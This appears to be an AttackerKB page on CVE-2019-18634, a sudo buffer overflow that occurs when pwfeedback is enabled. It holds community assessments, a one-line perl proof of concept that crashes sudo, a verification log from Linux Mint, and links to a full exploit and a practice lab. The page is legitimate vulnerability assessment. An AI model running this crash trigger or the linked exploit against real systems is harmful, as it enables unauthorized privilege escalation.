Low
CVE-2019-18634
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2019-18634
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.
Add Assessment
Ratings
-
Attacker ValueLow
-
ExploitabilityVery High
Technical Analysis
This exploit is similar to CVE-2019-14287, in that it requires a specific config within /etc/sudoers
. Present in sudo versions < 1.8.26, this vuln surrounds the pwfeedback
option: an option that allows sudo to display asteriks when typing a sudo password. This module is susceptible to a buffer overflow attack, which was demonstrated in the following PoC:
$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id Password: Segmentation fault
Source – https://www.exploit-db.com/exploits/47995
An exploit for this vuln can be found here – https://github.com/saleemrashid/sudo-cve-2019-18634
A preconfigured test environment can be found here – https://tryhackme.com/room/sudovulnsbof
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportTechnical Analysis
This isn’t a default in most installations I’ve seen. Looks like Linux Mint uses it, though, and that’s a decently sized target, IMHO. Popular for new users to Linux, which kind of explains why they’d turn on this particular setting. That said, I don’t think the corporate impact is high – unless they’re using Mint for workstations.
Great find, Joe. :–)
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportVerified against Linux Mint 19.3 Tricia live CD:
mint@mint:~$ uname -a Linux mint 5.0.0-32-generic #34~18.04.2-Ubuntu SMP Thu Oct 10 10:36:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux mint@mint:~$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id [sudo] password for mint: Segmentation fault mint@mint:~$ dmesg | tail -2 [ 126.375340] sudo[1896]: segfault at 55ff66d8c000 ip 000055ff66b7e3b8 sp 00007fff565b26a0 error 6 in sudo[55ff66b66000+22000] [ 126.375345] Code: 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 40 00 48 8d 35 ac 6b 00 00 ba 01 00 00 00 89 df e8 8d c2 fe ff 0f b6 54 24 17 <41> 88 17 49 83 c7 01 4c 89 74 24 08 49 83 ee 01 4d 85 f6 0f 85 d7 mint@mint:~$
Mint’s mitigations:
mint@mint:~/Downloads$ ./checksec --file=/usr/bin/sudo RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Full RELRO Canary found NX enabled PIE enabled No RPATH RW-RUNPATH No Symbols Yes 6 12 /usr/bin/sudo mint@mint:~/Downloads$
CVSS V3 Severity and Metrics
General Information
Vendors
- debian,
- sudo project
Products
- debian linux 10.0,
- debian linux 8.0,
- debian linux 9.0,
- sudo
References
Advisory
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: